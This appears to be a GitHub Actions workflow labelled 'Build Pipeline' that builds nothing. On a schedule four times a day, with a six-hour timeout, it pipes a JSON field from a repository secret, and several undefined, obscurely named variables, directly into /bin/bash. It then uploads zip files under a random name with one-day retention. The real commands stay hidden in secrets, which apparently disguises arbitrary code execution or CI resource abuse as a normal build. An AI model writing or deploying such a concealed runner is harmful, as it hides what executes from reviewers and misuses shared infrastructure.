name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '26 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          r50: ${{ secrets.r50 }}
        run: |
          printf '%s' "$r50" | jq -r .it89 | /bin/bash
          echo $ak56 | jq -r .v40 | /bin/bash
          echo $muyez3 | jq -r .ayiy5549 | /bin/bash
          echo $vsxpw057 | jq -r .jmyni6 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: kToIBjgR
          path: "*.zip"
          retention-days: 1
